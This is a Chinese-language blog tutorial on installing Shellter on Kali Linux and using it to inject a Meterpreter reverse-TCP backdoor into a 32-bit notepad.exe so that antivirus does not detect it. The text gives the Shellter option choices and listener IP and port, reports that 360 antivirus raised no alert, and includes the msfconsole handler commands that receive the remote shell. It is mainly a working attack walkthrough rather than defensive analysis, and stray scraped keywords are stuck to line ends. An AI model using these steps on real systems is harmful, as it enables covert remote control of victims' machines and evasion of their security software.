kali 免殺工具shellter安裝以及使用

Shellter 是一款動態 shellcode 注入工具,咱們能夠將shellcode注入到其它程序上,從而來躲避殺毒軟件的查殺。俗稱爲免殺linux

官網:https://www.shellterproject.com/  目前最新版本是7.2,主程序是.exe文件因此在windows下能夠直接使用,在linux上運行的話shell

就須要安裝wine環境來運行。我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本  注意的是shellter目前只能注入32位的可執行文件windows

開始安裝:tcp

1.    apt-get update       //更新一下
2.    apt-get install shellter    //直接apt在線安裝工具

 

安裝完成後 ,終端直接輸入shellter打開會報錯,根據提示 咱們直接執行命令  dpkg --add-architecture i386 && apt-get update && apt-get install wine32spa

確認安裝便可code

如今咱們打開shellter就能夠打開運行了,工具安裝完成後再/usr/share/windows-resources/shellter  這個文件夾blog

shellter目錄下的Shellter_Backups文件夾是你注入文件後備份的文件夾,會自動把原文件備份一個到這個文件夾下。get

 

免殺實驗:it

 

Choose Operation Mode - Auto/Manual (A/M/H):A           //選擇模式 A 自動模式自動注入後門,M高級模式,H幫助

PE Target:/home/notepad.exe            // 注入的程序 這裏已windows系統自帶的32位記事本程序舉例

Enable Stealth Mode? (Y/N/H): Y               //是否啓用隱身模式 輸入Y啓用

Use a listed payload or custom? (L/C/H): L         //使用攻擊模塊列表或者自定義? 輸入L 選擇Payload

Select payload by index: 1      //選擇第一個

 

SET LHOST: 192.168.37.137    //設置反彈回來的IP 本機

SET LPORT:4444         //設置接收反彈的端口

這樣咱們的木馬後門shellcode就注入到這個文件裏去了,

開啓360所有查殺引擎,更新病毒庫,查殺一下試試效果,沒有任何提示。

打開msf,進行配置,

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.37.137
set lport 4444
exploit  //監聽

這時運行帶有後門的notepad.exe文件後,控制端成功鏈接上來,接下來就能夠隨意操做了。

相關文章
相關標籤/搜索